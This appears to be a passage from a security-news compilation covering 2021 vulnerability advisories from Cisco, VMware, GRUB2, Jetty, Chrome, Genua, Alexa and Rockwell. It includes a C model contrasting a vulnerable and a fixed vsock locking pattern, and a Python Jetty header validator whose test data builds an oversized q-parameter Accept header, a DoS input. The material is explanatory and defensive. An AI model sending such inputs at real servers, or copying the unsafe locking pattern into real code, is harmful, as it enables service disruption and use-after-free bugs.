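struct vsock_sock {
    bool locked;                       /* models the socket lock */
    struct vsock_transport *transport; /* the vsock_sock.transport pointer */
};

static void lock_sock(struct vsock_sock *vsk)    { vsk->locked = true; }
static void release_sock(struct vsock_sock *vsk) { vsk->locked = false; }

/* A preemption point: the function passed here models what another task does
 * when it gets to run. Each operation below calls it where the lock is free. */
typedef void (*other_task_fn)(struct vsock_sock *vsk);

/* Constructed transports used by the scenarios. */
static struct vsock_transport old_transport;
static struct vsock_transport new_transport;

/* The competing task: a transport reassignment. In the kernel this itself
 * runs under lock_sock(), so it cannot proceed while the lock is held;
 * that is modelled by returning early. */
static void reassign_transport(struct vsock_sock *vsk)
{
    if (vsk->locked)
        return;                        /* would sleep on the lock */
    vsk->transport->destroyed = true;  /* old transport torn down */
    vsk->transport = &new_transport;
}

/* Use the transport: 0 for a live one, -1 if the caller dereferenced a
 * transport that has already been destroyed. */
static int use_transport(const struct vsock_transport *t)
{
    return t->destroyed ? -1 : 0;
}

/* Vulnerable pattern (pre-fix af_vsock.c): the transport pointer is copied
 * to a local BEFORE lock_sock() and used after the lock is taken. */
static int vsock_op_vulnerable(struct vsock_sock *vsk, other_task_fn other)
{
    struct vsock_transport *transport = vsk->transport; /* copied too early */
    other(vsk);                 /* another task runs while the lock is free */
    lock_sock(vsk);
    int rc = use_transport(transport); /* stale pointer used under the lock */
    release_sock(vsk);
    return rc;
}

/* Fixed pattern: copy the pointer only AFTER lock_sock(); the value read is
 * then stable for as long as the lock is held. */
static int vsock_op_fixed(struct vsock_sock *vsk, other_task_fn other)
{
    other(vsk);                 /* may reassign before we take the lock ... */
    lock_sock(vsk);
    struct vsock_transport *transport = vsk->transport; /* ... so read it here */
    other(vsk);                 /* cannot reassign now: the lock is held */
    int rc = use_transport(transport);
    release_sock(vsk);
    return rc;
}

/* Reset the model and run one scenario; returns the use_transport() result. */
int run_scenario(bool fixed)
{
    old_transport = (struct vsock_transport){ .name = "old", .destroyed = false };
    new_transport = (struct vsock_transport){ .name = "new", .destroyed = false };
    struct vsock_sock vsk = { .locked = false, .transport = &old_transport };
    return fixed ? vsock_op_fixed(&vsk, reassign_transport)
                 : vsock_op_vulnerable(&vsk, reassign_transport);
}

int main(void)
{
    printf("vulnerable pattern: %s\n", run_scenario(false) == 0
           ? "used live transport" : "used destroyed transport");
    printf("fixed pattern:      %s\n", run_scenario(true) == 0
           ? "used live transport" : "used destroyed transport");
    return 0;
}
```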

"I successfully developed a prototype exploit for local privilege escalation on Fedora 33 Server, bypassing x86_64 platform protections such as SMEP and SMAP. This research will lead to new ideas on how to improve Linux kernel security," Popov commented.

In addition to identifying the vulnerabilities, the security researcher prepared a patch and sent it to the Linux kernel security team. The fix was merged into mainline kernel version 5.11-rc7 and also got backported into affected stable trees.


Several Cisco Products Exposed to DoS Attacks Due to Snort Vulnerability
6.3.2021
Vulnerebility  Securityweek

Cisco informed customers on Wednesday that several of its products are exposed to denial-of-service (DoS) attacks due to a vulnerability in the Snort detection engine.

The flaw, tracked as CVE-2021-1285 and rated high severity, can be exploited by an unauthenticated, adjacent attacker — the attacker is on the same layer 2 domain as the victim — to cause a device to enter a DoS condition by sending it specially crafted Ethernet frames.

Cisco says the vulnerability is in the Ethernet Frame Decoder component of Snort. The issue impacts all versions of the popular open source intrusion prevention and intrusion detection system (IPS/IDS) prior to 2.9.17, which contains a patch.

CVE-2021-1285 has been found to impact Integrated Service Router (ISR), Catalyst Edge software and platform, and 1000v series Cloud Services Router products. These devices are affected if they are running a vulnerable version of Cisco UTD Snort IPS engine software for IOS XE or Cisco UTD Engine for IOS XE SD-WAN, and they are configured to pass Ethernet frames to Snort.

Cisco says the vulnerability is related to a Firepower Threat Defense (FTD) issue patched in October 2020.

The vulnerability was found during the resolution of a support case and there is no evidence that it has been exploited in malicious attacks.

Cisco on Wednesday also published advisories for a dozen other vulnerabilities, which have been assigned a medium severity rating. These impact Webex, SD-WAN, ASR, Network Services Orchestrator, IP phones, and Email Security Appliance products, and they can lead to information disclosure, path traversal, authorization bypass, DoS attacks, privilege escalation, and SQL injection.


VMware addresses Remote Code Execution issue in View Planner
5.3.2021 Vulnerebility  Securityaffairs

VMware released a security patch for a remote code execution vulnerability that affects the VMware View Planner product.
VMware released a security patch for a remote code execution flaw, tracked as CVE-2021-21978, that affects the VMware View Planner.

The View Planner is a free tool for Performance Sizing and Benchmarking of Virtual Desktop Infrastructure environments.

The vulnerability was reported by Positive Technologies researcher Mikhail Klyuchnikov.
The company fixed the CVE-2021-21978 vulnerability with the release of version 4.6 Security Patch 1 on March 2. The vulnerability received a CVSS score of 8.6.

“A vulnerability in VMware View Planner was privately reported to VMware. An update is available to remediate this vulnerability in affected VMware products.” reads the advisory published by the company. “Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container.”

The issue is caused by improper input validation and a lack of authorization that could allow an attacker to upload specially crafted files to the logupload web application. The vulnerability could be exploited only by an attacker with network access.

VMware recommends installing the security patch; it is not known whether the flaw has been exploited in attacks in the wild.


GRUB2 boot loader maintainers fixed hundreds of flaws
5.3.2021 Vulnerebility  Securityaffairs

Now maintainers at the GRUB project have released security updates to address more than 100 vulnerabilities.
GRUB2 (the GRand Unified Bootloader version 2) is the replacement for the original GRUB boot loader, which is now referred to as “GRUB Legacy”. Together with UEFI Secure Boot, it is part of the mechanism designed to protect the boot process from attacks.

In July 2020, researchers at the firmware security firm Eclypsium disclosed a buffer overflow vulnerability, tracked as CVE-2020-10713 and dubbed BootHole, which can be exploited by attackers to install persistent and stealthy malware.

“The BootHole vulnerability [announced last year encouraged many people to take a closer look at the security of boot process in general and the GRUB bootloader in particular. Due to that, during past few months we were getting reports of, and also discovering various security flaws in the GRUB ourselves.” wrote GRUB maintainer Daniel Kiper on GRUB’s mailing list. “You can find the list of most severe ones which got CVEs assigned at the end of this message. The patch bundle fixing all these issues in the upstream GRUB contains 117 patches.”

The GRUB project maintainers released a total of 117 upstream code patches for the above flaws.

Below is the list of GRUB2 vulnerabilities shared in the mailing list post:
CVE-2020-14372 grub2: The acpi command allows a privileged user to load crafted ACPI tables when Secure Boot is enabled. CWE-184 (CVSS 7.5). Reported by Máté Kukri.
CVE-2020-25632 grub2: Use-after-free in the rmmod command. CWE-416 (CVSS 7.5). Reported by Chris Coulson (Canonical).
CVE-2020-25647 grub2: Out-of-bounds write in grub_usb_device_initialize(). CWE-787 (CVSS 6.9). Reported by Joseph Tartaro (IOActive) and Ilja van Sprundel (IOActive).
CVE-2020-27749 grub2: Stack buffer overflow in grub_parser_split_cmdline. CWE-121 (CVSS 7.5). Reported by Chris Coulson (Canonical).
CVE-2020-27779 grub2: The cutmem command allows a privileged user to remove memory regions when Secure Boot is enabled. CWE-285 (CVSS 7.5). Reported by Teddy Reed.
CVE-2021-3418 grub2: GRUB 2.05 reintroduced CVE-2020-15705. CWE-281 (CVSS 6.4). Reported by Dimitri John Ledkov (Canonical).
CVE-2021-20225 grub2: Heap out-of-bounds write in the short form option parser. CWE-787 (CVSS 7.5). Reported by Daniel Axtens (IBM).
CVE-2021-20233 grub2: Heap out-of-bounds write due to miscalculation of the space required for quoting. (CVSS 7.5). Reported by Daniel Axtens (IBM).
“In addition, we have been working on a generation number based revocation scheme termed UEFI Secure Boot Advanced Targeting (SBAT) [3]. This will require an UEFI dbx release and resigning all the artifacts — shim, GRUB, kernel, etc. — needed to boot the system. This is the same as we did for the BootHole series of vulnerabilities, but the SBAT work is designed to make this process much less painful in the future.” Kiper added. “Details of exactly what needs updating will be provided by the respective distros and vendors when updates become available. Here [4] we are listing at least some links to the messaging known at the time of this posting.”

Major Linux distros, including Debian, RedHat, and Ubuntu, released security advisories for the above vulnerabilities.

“Details of exactly what needs updating will be provided by the respective distros and vendors when updates become available.” concluded Kiper.

“Full mitigation against all the CVEs will require an updated UEFI revocation list (dbx) which, in at least some cases, will not allow Secure Boot with today’s boot artifacts.”


Intel Paid Out $800,000 Per Year Through Bug Bounty Program
4.3.2021
Vulnerebility  Securityweek

Over 230 Vulnerabilities Patched in Intel Products in 2020

Intel patched 231 vulnerabilities in its products last year, roughly the same as in the previous year, when it fixed 236 flaws.

The chipmaker on Wednesday published its 2020 Product Security Report, which reveals that nearly half of the vulnerabilities patched last year were discovered by its own employees, and the company claims that a vast majority of the addressed issues are the direct result of its investment in product security assurance.

According to Intel, 105 vulnerabilities were reported through the company’s bug bounty program, which saw a 33% increase in submissions compared to the previous year. The company also reported seeing a significant increase in the number of external security researchers it engaged with.


Intel said it paid out an average of $800,000 per year through its bug bounty program since it was launched in 2018.

The report shows that 93 vulnerabilities were found in software, 66 in firmware, and 58 required both firmware and software updates to patch. Fourteen flaws were found to affect hardware.

In terms of severity, only 3% of the security holes patched last year were rated critical. Roughly one-third were rated high severity, and 57% were assigned a medium severity rating.

“The impact of most of the medium, high, and critical vulnerabilities is potential elevation of privilege,” Intel explained in its report. “In the case of medium severity issues, these require an authenticated user on the same physical network or who has physical access to a vulnerable system. These issues become high or critical, if an unauthenticated user can trigger the vulnerability and/or they can reach a vulnerable system from outside the local area network.”


Jetty Flaw Can Be Exploited to Inflate Target's Cloud Bill, Cause Disruption
4.3.2021
Vulnerebility  Securityweek

A vulnerability affecting Eclipse Jetty web servers can be exploited by an attacker to inflate a targeted organization’s cloud services bill or cause disruption, according to security researchers at tech company Synopsys.

Jetty is an open source Java web server and servlet container that has been used in a wide range of projects and products, including by major companies such as Facebook, Google and Yahoo.

Synopsys researchers discovered that Jetty versions 9.4.6 through 9.4.36, 10.0.0 and 11.0.0 are affected by a denial-of-service (DoS) vulnerability.

The issue was reported to Jetty developers on February 10 and it was patched a couple of weeks later in all impacted versions.

“When Jetty handles a request containing request headers with a large number of ‘quality’ (i.e. q) parameters (such as what are seen on the Accept, Accept-Encoding, and Accept-Language request headers), the server may enter a denial of service (DoS) state due to high CPU usage while sorting the list of values based on their quality values. A single request can easily consume minutes of CPU time before it is even dispatched to the application,” reads an advisory published by Jetty developers.

Travis Biehn, principal security consultant at Synopsys, told SecurityWeek that an attacker could exploit this vulnerability to “run up an organization’s bill or degrade service for other users.”

“Consider an organization that has some sort of auto-scaling Amazon infrastructure. For instance, overloading one server causes another to be provisioned and an attacker can run up a customer’s bill by leveraging this attack,” Biehn explained.

“The nuts and bolts of executing the attack are that the attacker just needs to be able to get HTTP requests to a vulnerable Jetty server with a malicious Accept header. No authentication is required,” he added. “It’s not typical to see Jetty serving the edge directly, so it’s possible that components like load balancers might make exploitation more difficult.”
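As an added defender-side illustration (not code from Jetty or Synopsys), the following Python check parses quality lists the way the advisory describes, but counts the q parameters while parsing and rejects an oversized Accept-style header before any sorting takes place; the threshold, header set and sample requests are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Assumed (hypothetical) policy threshold: real browser headers carry a handful
# of q parameters, not dozens. This value is not taken from Jetty's fix.
MAX_QVALUES_PER_HEADER = 32

# Request headers that RFC 7231 allows to carry quality (q) parameters.
QUALITY_HEADERS = {"accept", "accept-charset", "accept-encoding", "accept-language"}

# qvalue grammar from RFC 7231 section 5.3.1: 0 to 1 with at most three decimals.
_QVALUE_RE = re.compile(r"^(?:0(?:\.\d{0,3})?|1(?:\.0{0,3})?)$")


class QualityListTooLong(ValueError):
    """Raised when a header carries more q parameters than the policy allows."""


def parse_quality_list(value: str, limit: int = MAX_QVALUES_PER_HEADER) -> List[Tuple[str, float]]:
    """Parse 'a;q=0.5, b, c;q=0.1' into [(value, q), ...] ordered by q descending.

    The number of q parameters is checked *while* parsing, before the sort, so an
    oversized list is rejected at linear cost instead of being sorted.
    """
    entries: List[Tuple[str, float]] = []
    q_count = 0
    for item in value.split(","):
        item = item.strip()
        if not item:
            continue
        token, *params = (p.strip() for p in item.split(";"))
        q = 1.0  # RFC 7231 default when q is absent
        for param in params:
            name, _, raw = param.partition("=")
            if name.strip().lower() != "q":
                continue  # other parameters (e.g. charset=) do not affect ranking
            q_count += 1
            if q_count > limit:
                raise QualityListTooLong(f"{q_count} q parameters exceeds limit {limit}")
            raw = raw.strip()
            if not _QVALUE_RE.match(raw):
                raise ValueError(f"malformed qvalue: {raw!r}")
            q = float(raw)
        entries.append((token, q))
    # Stable sort: entries with equal q keep their original header order.
    entries.sort(key=lambda entry: entry[1], reverse=True)
    return entries


def inspect_request(headers: Dict[str, str], limit: int = MAX_QVALUES_PER_HEADER) -> List[str]:
    """Return one finding per quality header that violates the policy.

    An empty list means the request can be handed on to the servlet container.
    """
    findings: List[str] = []
    for name, value in headers.items():
        if name.lower() not in QUALITY_HEADERS:
            continue
        try:
            parse_quality_list(value, limit)
        except ValueError as exc:  # QualityListTooLong is a ValueError too
            findings.append(f"{name}: {exc}")
    return findings


# Constructed sample requests (not captured traffic).
BROWSER_REQUEST = {
    "Host": "example.invalid",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-GB,en;q=0.9,de;q=0.5",
}

# Constructed oversized input for the check: 200 media ranges, each with its own q.
ABUSIVE_REQUEST = {
    "Host": "example.invalid",
    "Accept": ",".join(f"text/x{i};q=0.{i % 10}" for i in range(200)),
}


if __name__ == "__main__":
    for label, req in (("browser", BROWSER_REQUEST), ("oversized", ABUSIVE_REQUEST)):
        print(label, inspect_request(req) or "ok")
```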


VMware Patches Remote Code Execution Vulnerability in View Planner
4.3.2021
Vulnerebility  Securityweek

VMware this week announced the availability of a security patch for VMware View Planner, to address a vulnerability leading to remote code execution.

The benchmarking tool provides consistent methodology for the comparison of virtual desktop deployment platforms, measuring both the performance of application operations and the scalability of the deployment platform.

With the release of View Planner 4.6 Security Patch 1 on March 2, VMware fixes CVE-2021-21978, an issue that could allow an attacker to execute code remotely. The bug features a CVSS score of 8.6.

In its advisory, VMware explains that the bug is, in fact, rooted in improper input validation, complemented by lack of authorization.

Together, these issues could be abused for the upload of arbitrary files in the logupload web application, which could then lead to code execution.

According to the company, an attacker looking to exploit this bug needs to have already compromised the network in order to access View Planner Harness.

The attacker could then abuse the vulnerability to upload a specially crafted file and then execute it, which would essentially result in the execution of code remotely, within the logupload container.

The company also notes that it considers the vulnerability “to be in the Important severity range,” and that the bug was privately reported.

VMware recommends that all affected customers apply the security patch that was released this week, to ensure they are protected.

The issue was reported by Mikhail Klyuchnikov, a researcher with Positive Technologies. VMware makes no mention of the vulnerability being exploited in the wild.


Google fixes Critical Remote Code Execution issue in Android System component
3.3.2021
Vulnerebility  Securityaffairs

Google addressed 37 vulnerabilities with the release of the Android security updates for March 2021, including a critical flaw in the System component.
Google released security updates to address 37 vulnerabilities as part of the Android security updates for March 2021, the most severe of which is a critical flaw in the System component tracked as CVE-2021-0397.

Google addressed the flaw as part of the 2021-03-01 security patch level.

The CVE-2021-0397 vulnerability is a remote code execution issue that affects Android 8.1, 9, 10, and 11 releases.

“The most severe of these issues is a critical security vulnerability in the System component that could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process,” reads the advisory published by Google.

The tech giant also fixed a total of 27 other security flaws as part of the 2021-03-05 security patch level, including one in Kernel components, four in Qualcomm components, and 22 in Qualcomm closed-source components.

5 out of 27 issues were rated as critical (CVE-2020-11192, CVE-2020-11204, CVE-2020-11218, CVE-2020-11227, CVE-2020-11228) and affect Qualcomm closed-source components.

Google’s March 2021 Android Security Bulletin also includes the fix for the CVE-2021-0390 flaw in Project Mainline components, which affects Wi-Fi.

Why does this bulletin have two security patch levels?

“Devices that use the 2021-03-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
Devices that use the security patch level of 2021-03-05 or newer must include all applicable patches in this (and previous) security bulletins.
Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.”


New Chrome 0-day Bug Under Active Attacks – Update Your Browser ASAP!
3.3.2021
Vulnerebility  Thehackernews

Exactly a month after patching an actively exploited zero-day flaw in Chrome, Google today rolled out fixes for yet another zero-day vulnerability in the world's most popular web browser that it says is being abused in the wild.

Chrome 89.0.4389.72, released by the search giant for Windows, Mac, and Linux on Tuesday, comes with a total of 47 security fixes, the most severe of which concerns an "object lifecycle issue in audio."

Tracked as CVE-2021-21166, the security flaw is one of the two security bugs reported last month by Alison Huffman of Microsoft Browser Vulnerability Research on February 11. A separate object lifecycle flaw, also identified in the audio component, was reported to Google on February 4, the same day the stable version of Chrome 88 became available.

With no additional details, it's not immediately clear if the two security shortcomings are related.

Google acknowledged that an exploit for the vulnerability exists in the wild but stopped short of sharing more specifics to allow a majority of users to install the fixes and prevent other threat actors from creating exploits targeting this zero-day.

"Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild," Chrome Technical Program Manager Prudhvikumar Bommana said.

This is the second zero-day flaw addressed by Google in Chrome since the start of the year.

On February 4, the company issued a fix for an actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.

Additionally, Google last year resolved five Chrome zero-days that were actively exploited in the wild in a span of one month between October 20 and November 12.

Chrome users can update to Chrome 89 by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.


Firewall Vendor Patches Critical Auth Bypass Flaw

2.3.2021  Vulnerebility  Threatpost

Cybersecurity firm Genua fixes a critical flaw in its GenuGate High Resistance Firewall, allowing attackers to log in as root users.

Germany-based cybersecurity company Genua has fast-tracked a fix for a critical flaw in one of its firewall products. If exploited, the vulnerability could allow local attackers to bypass authentication measures and log in to internal company networks with the highest level of privileges.

Genua says it offers more than 20 security solutions for encrypting data communication via the internet, remotely maintaining systems, securely accessing remote data and more – used by anything from critical infrastructure companies to German federal agencies. Affected by the critical flaw is the GenuGate High Resistance Firewall, which Genua touts as a two-tier firewall that includes an application-level gateway and a packet filter for blocking malicious data.

“An unauthenticated attacker is able to successfully login as arbitrary user in the admin web interface, the side channel interface and user web interface, even as root with highest privileges, by manipulating certain HTTP POST parameters during login,” according to security and application consultation company SEC Consult on Monday.

Genua says that the GenuGate High Resistance Firewall blocks internal networks against unauthorized access, and structures an intranet to establish various domains with different protection measures.

According to Genua, GenuGate is classified as “NATO Restricted.” NATO Restricted is a security classification for restricted information from the North Atlantic Treaty Organization. It requires that certain products contain safeguards and protection from public release and disclosure. According to Genua:

“The High Resistance Firewall genugate satisfies the highest requirements: two different firewall systems – an application level gateway and a packet filter, each on separate hardware – are combined to form a compact solution. genugate is approved for classification levels German and NATO RESTRICTED and RESTREINT UE/EU RESTRICTED. genugate is certified according to CC EAL 4+”

The vulnerable versions of the firewall are GenuGate versions below 10.1 p4, below 9.6 p7, and 9.0 and 9.0 Z below p19. The flaw has been fixed in GenuGate versions 10.1 p4 (G1010_004); 9.6 p7 (G960_007); 9.0 and 9.0 Z p19 (G900_019).

“The vendor provides a patched version for the affected products which should be installed immediately,” according to SEC Consult. “Customers should also adhere to security best practices such as network segmentation and limiting access to the admin panel. This is also a requirement for certified and approved environments.”

Critical GenuGate Firewall Cybersecurity Flaw
The critical authentication bypass vulnerability (CVE-2021-27215) stems from GenuGate’s various admin authentication methods. The admin web interface, the sidechannel web interface and the userweb interface use different methods to authenticate users.

But during the login process, certain HTTP POST parameters are passed to the server, which does not check the provided data, and allows for any authentication request.

By manipulating a specific parameter, an attacker would be able to bypass the authentication easily and log in as an arbitrary user. That could include logging in as a root user with the highest privileges (or even as a non-existing user), said SEC Consult researchers.

Researchers with SEC Consult published a high-level proof-of-concept (PoC) exploit, including a video (see below). However, researchers abstained from publishing specific PoC details due to the critical nature of the bug.

There is one caveat. In order to exploit the vulnerability, an attacker would first need to have network access to the admin interface.

“Certified and approved environments mandate that the admin interface is only reachable through a strictly separated network,” according to SEC Consult. “Nevertheless, it is a highly critical security vulnerability and must be patched immediately.”

Cybersecurity Firewall Vulnerabilities and Remediation
Researchers contacted Genua on Jan. 29 regarding the vulnerability. That same day, Genua confirmed the issue and began working on a patch – and released a patch for the affected product on Feb. 2. The public disclosure of the vulnerability (in coordination with CERT-Bund and CERT) was published on Monday. SEC Consult said the patch can be downloaded in the GenuGate GUI or by calling “getpatches” on the command line interface.

Firewall vulnerabilities provide a dangerous route for attackers to infiltrate sensitive company networks.

In January, security experts warned hackers are ramping up attempts to exploit a high-severity vulnerability that may still reside in over 100,000 Zyxel Communications products, which are generally utilized by small businesses as firewalls and VPN gateways. In April, attackers started targeting the Sophos XG Firewall (both physical and virtual versions) using a zero-day exploit, with the ultimate goal of dropping the Asnarok malware on vulnerable appliances.

Genua has not responded to a request for comment.


Amazon Dismisses Claims Alexa ‘Skills’ Can Bypass Security Vetting Process
27.2.2021 
Vulnerebility  Threatpost

Researchers found a number of privacy and security issues in Amazon’s Alexa skill vetting process, which could lead to attackers stealing data or launching phishing attacks.

Researchers warn Amazon’s voice assistant Alexa is vulnerable to malicious third-party “skills” – voice assistant capabilities developed by third parties – that could leave smart-speaker owners vulnerable to a wide range of cyberattacks.

The security-threat claim is roundly dismissed by Amazon.

Researchers scrutinized 90,194 unique skills from Amazon’s skill stores across seven countries. The report, presented at the Network and Distributed System Security Symposium 2021 this week, found widespread security issues that could lead to phishing attacks or the ability to trick Alexa users into revealing sensitive information.

“While skills expand Alexa’s capabilities and functionalities, it also creates new security and privacy risks,” said a group of researchers from North Carolina State University, the Ruhr-University Bochum and Google, in a research paper (PDF).

“We identify several gaps in the current ecosystem that can be exploited by an adversary to launch further attacks, including registration of arbitrary developer name, bypassing of permission APIs, and making backend code changes after approval to trigger dormant intents,” they said.

An Amazon spokesperson told Threatpost that the company conducts security reviews as part of skill certification, and has systems in place to continually monitor live skills for potentially malicious behavior.

“The security of our devices and services is a top priority,” said the Amazon spokesperson. “Any offending skills we identify are blocked during certification or quickly deactivated. We are constantly improving these mechanisms to further protect our customers. We appreciate the work of independent researchers who help bring potential issues to our attention.”

What is an Amazon Alexa Skill?
A skill is essentially an application for Alexa, made by third-party developers, which can be installed or uninstalled by users on their corresponding Alexa smartphone app. These skills have a variety of functionalities – from reading stories to children, to interacting with services like Spotify.

For developers to build a skill, they need the following elements:

An invocation name identifying the skill
A set of “intents,” which are the actions Alexa users must take to invoke the skill
Specific words or phrases that users can utilize to invoke the desired intents
A cloud-based service to accept requests and consequently act on them
A configuration that brings the intents, invocation names and cloud-based service together, so Alexa can route the correct requests to the desired skill
Finally, before the skills can be actively made public to Alexa users, developers must submit their skills to be vetted and verified by Amazon. During this vetting process, Amazon ensures that the skills meet their policy guidelines.

For instance, Amazon makes sure that the privacy policy link for the skill is valid, and that the skill meets the security requirements needed for hosting services on external servers (by checking whether the server responds to requests that aren’t signed by an Amazon-approved certificate authority, for instance).

Amazon’s Alexa Skill Vetting is Lacking
However, researchers said they found several glaring issues with Amazon’s skill vetting process. For one, developers can get away with registering skills that use some (but not other) well-known company names – such as Ring, Withings or Samsung. Bad actors could then leverage these fake skill brand names by sending phishing emails to users that link to the skill’s Amazon store webpage – ultimately adding an air of legitimacy to the phishing message and tricking users into handing over valuable information.

Image credit: Researchers with North Carolina State University, the Ruhr-University Bochum and Google

Researchers said they found 9,948 skills in the U.S. skill store, for instance, that shared the same invocation name with at least one other skill – and across all skill stores, they found that only 36,055 (out of the 90,194) skills had a unique invocation name.

“This primarily happens because Amazon currently does not employ any automated approach to detect infringements for the use of third-party trademarks, and depends on manual vetting to catch such malevolent attempts which are prone to human error,” said researchers.

Another issue highlighted by researchers is that attackers can make code changes after their skills have been approved by Amazon, opening the door for various malicious intents. The issue here stems from the ability for developers to register various intents during the certificate process.

“Thus, an attacker can register dormant intents which are never triggered during the certification process to evade being flagged as suspicious,” said researchers. “However, after the certification process the attacker can change the backend code (e.g., change the dialogue to request for a specific information) to trigger dormant intents.”

In a real-world scenario, this could open the door for attackers to make code changes that could convince a user into revealing sensitive information – such as bank account details or otherwise.

Issues With Alexa Privacy Policy Model
Researchers said that this requesting of sensitive information points to a larger overarching, conceptual (rather than technical implementation) issue.

Alexa skills can be configured to request permissions from users to access personal information from the Alexa account – such as the user’s address or contact information. However, researchers said that they uncovered instances where skills bypass the permission APIs and directly request such information from end users.

Image credit: Researchers with North Carolina State University, the Ruhr-University Bochum and Google

Some skills, for instance, included the name of a user’s specific locations as part of the invocation phrase. Researchers pointed to local news provider “Patch,” which created 775 skills that include a city name. Such skills can potentially be used to track one’s whereabouts, they argued.

“One could argue that this is not an issue as users explicitly provide their information, however, there may be a disconnect between how developers and users perceive the permission model,” said researchers. “A user may not understand the difference between providing sensitive data through the permission APIs versus entering them verbally.”

In another privacy issue, researchers found that 23.3 percent of the privacy policies viewed for skills were not fully disclosing the data types that were associated with permissions requested by a skill. For instance, 33 percent of skills accessing a user’s full name did not disclose that type of data collection in their privacy policy.

Amazon Alexa: Previous Skills Hacks
Alexa skills have come under scrutiny in the past, starting in 2018 when researchers created a proof-of-concept “rogue skill” that could eavesdrop on Alexa users – and automatically transcribe every word said.

In 2019, researchers said that vulnerabilities stemming from skills could enable what they called a “Smart Spies” hack, which allows for eavesdropping, voice-phishing, or using people’s voice cues to determine passwords.

Amazon, for its part, in 2019 did make a few modifications to make this “Smart Spies” hack more difficult. However, researchers called the mitigations “comically ineffective,” saying that Amazon (and other voice assistant makers, such as Google) need to focus on weeding out malicious skills from the get-go, rather than after they are already live.

Finally, as recently as August, researchers disclosed flaws in Alexa that could allow attackers to access personal data and install skills on Echo devices.

“Our analysis shows that while Amazon restricts access to user data for skills and has put forth a number of rules, there is still room for malicious actors to exploit or circumvent some of these rules,” said researchers this week. “This can enable an attacker to exploit the trust they have built with the system.”


Unprotected Private Key Allows Remote Hacking of Rockwell Controllers
27.2.2021 
Vulnerebility  Securityweek

Industrial organizations have been warned this week that a critical authentication bypass vulnerability can allow hackers to remotely compromise programmable logic controllers (PLCs) made by industrial automation giant Rockwell Automation.

The vulnerability, tracked as CVE-2021-22681 with a CVSS score of 10, was independently reported to Rockwell by researchers at the Soonchunhyang University in South Korea, Kaspersky, and industrial cybersecurity firm Claroty.

Advisories for this flaw were published this week by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Rockwell (account required). Claroty has also released a blog post with a high-level description of its findings.

The vulnerability impacts Studio 5000 Logix Designer (formerly RSLogix 5000), the popular design and configuration software for PLCs, as well as over a dozen CompactLogix, ControlLogix, DriveLogix, Compact GuardLogix, GuardLogix, and SoftLogix controllers.

The problem is related to the Logix Designer software using a private cryptographic key to verify communications with controllers. This key is not sufficiently protected, allowing a remote, unauthenticated attacker to bypass the verification mechanism and connect to the controller by mimicking an engineering workstation.

Once they have connected to the PLC, an attacker on the targeted organization’s network — or malware — can upload malicious code to the controller, download information from the device, or install new firmware. Claroty pointed out that exploitation of the vulnerability could directly impact a manufacturing process.

Claroty said it reported the issue to Rockwell back in 2019. It’s unclear when the others informed the vendor about the vulnerability.

Rockwell has advised customers to implement mitigations to reduce the risk of exploitation, including putting controllers into “Run mode,” deploying CIP Security to prevent unauthorized connections, and updating the controller firmware. It has also shared information for detecting potentially malicious changes and making general security improvements.


Cisco Releases Security Patches for Critical Flaws Affecting its Products
27.2.2021 
Vulnerebility  Thehackernews

Cisco has addressed a maximum severity vulnerability in its Application Centric Infrastructure (ACI) Multi-Site Orchestrator (MSO) that could allow an unauthenticated, remote attacker to bypass authentication on vulnerable devices.

"An attacker could exploit this vulnerability by sending a crafted request to the affected API," the company said in an advisory published yesterday. "A successful exploit could allow the attacker to receive a token with administrator-level privileges that could be used to authenticate to the API on affected MSO and managed Cisco Application Policy Infrastructure Controller (APIC) devices."

The bug, tracked as CVE-2021-1388, ranks 10 (out of 10) on the CVSS vulnerability scoring system and stems from improper token validation in an API endpoint of Cisco ACI MSO installed on the Application Services Engine. It affects ACI MSO versions running a 3.0 release of the software.

The ACI Multi-Site Orchestrator lets customers monitor and manage application-access networking policies across Cisco APIC-based devices.

Separately, the company also patched multiple flaws in Cisco Application Services Engine (CVE-2021-1393 and CVE-2021-1396, CVSS score 9.8) that could allow a remote attacker to access a privileged service or specific APIs, resulting in the ability to run containers or invoke host-level operations, and to learn "device-specific information, create tech support files in an isolated volume, and make limited configuration changes."

Both the flaws were a result of insufficient access controls for an API running in the Data Network, Cisco noted.

The networking major said the aforementioned three weaknesses were discovered during internal security testing but added it detected no malicious attempts exploiting the vulnerabilities in the wild.

Lastly, Cisco fixed a vulnerability (CVE-2021-1361, CVSS score 9.8) in the implementation of an internal file management service for Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches running NX-OS, the company's network operating system used in its Nexus-branded Ethernet switches.

This could allow a bad actor to create, delete, or overwrite arbitrary files with root privileges on the device, the company cautioned, including permitting the attacker to add a user account without the device administrator's knowledge.

Cisco said Nexus 3000 and Nexus 9000 switches running Cisco NX-OS Software Release 9.3(5) or Release 9.3(6) are vulnerable by default.

"This vulnerability exists because TCP port 9075 is incorrectly configured to listen and respond to external connection requests," Cisco outlined in the advisory. "An attacker could exploit this vulnerability by sending crafted TCP packets to an IP address that is configured on a local interface on TCP port 9075."

The patches come weeks after Cisco rectified as many as 44 flaws in its Small Business routers that could potentially allow an unauthenticated, remote attacker to execute arbitrary code as the root user and even cause a denial-of-service condition.


Cisco Warns of Critical Auth-Bypass Security Flaw
26.2.2021
Vulnerebility  Threatpost

Cisco also stomped out a critical security flaw affecting its Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches.

A critical vulnerability in Cisco Systems’ intersite policy manager software could allow a remote attacker to bypass authentication.

The vulnerability is one of three critical flaws fixed by Cisco this week. It exists in Cisco’s ACI Multi-Site Orchestrator (ACI MSO) — Cisco’s management software for businesses, which allows them to monitor the health of all interconnected policy-management sites.

The flaw stems from improper token validation on an API endpoint in Cisco’s ACI MSO.

